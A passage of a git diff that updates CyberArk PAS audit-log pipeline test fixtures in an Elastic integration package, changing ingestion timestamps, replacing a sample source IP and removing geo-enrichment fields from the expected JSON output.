Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"test12\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1604943844\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1604944158\"}]}}}}", "code": "24", "kind": "event", @@ -174,7 +174,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.491235800Z", + "ingested": "2021-12-09T13:36:41.659748100Z", "original": "\u003c5\u003e1 2021-03-08T19:20:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:05\",\"IsoTimestamp\":\"2021-03-08T19:20:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountA;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", @@ -278,7 +278,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.491240700Z", + "ingested": "2021-12-09T13:36:41.659752800Z", "original": "\u003c5\u003e1 2021-03-10T23:39:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:28\",\"IsoTimestamp\":\"2021-03-10T23:39:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountB;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"25\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615419568\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", @@ -383,7 +383,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.491244900Z", + "ingested": "2021-12-09T13:36:41.659756400Z", "original": "\u003c5\u003e1 2021-03-15T10:12:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e24\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=components;username=x_accountA;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"28\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615803143\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Inactive\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:24\",\"IsoTimestamp\":\"2021-03-15T10:12:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountA;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"28\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615803143\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log index 7284820d8e4..efc7388178f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log @@ -1,4 +1,4 @@ -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json index e083c4b0284..e1bdf0441e2 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -45,7 +33,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:21Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add/Update Group", "source_user": "PSMMaster", "message": "Add/Update Group", @@ -60,8 +48,8 @@ "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-06-09T10:24:29.637782200Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.237014100Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" } @@ -73,20 +61,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -103,7 +79,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -111,7 +87,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:21Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add/Update Group", "source_user": "PSMAppUsers", "message": "Add/Update Group", @@ -126,8 +102,8 @@ "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-06-09T10:24:29.637798100Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.237022200Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" } @@ -139,20 +115,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -169,7 +133,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -177,7 +141,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:35Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add/Update Group", "source_user": "PSMP_ADB_AppUsers", "message": "Add/Update Group", @@ -192,8 +156,8 @@ "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-06-09T10:24:29.637803100Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.237027700Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" } @@ -205,20 +169,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -235,7 +187,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -243,7 +195,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T17:59:29Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add/Update Group", "source_user": "PSMLiveSessionTerminators", "message": "Add/Update Group", @@ -258,8 +210,8 @@ "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-06-09T10:24:29.637807400Z", - "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMLiveSessionTerminators\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:42.237031800Z", + "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMLiveSessionTerminators\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log index bff61c277da..709d22f77a2 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log @@ -1,14 +1,14 @@ -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PVWAGWAccounts","TargetUser":"PSMPGW_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group 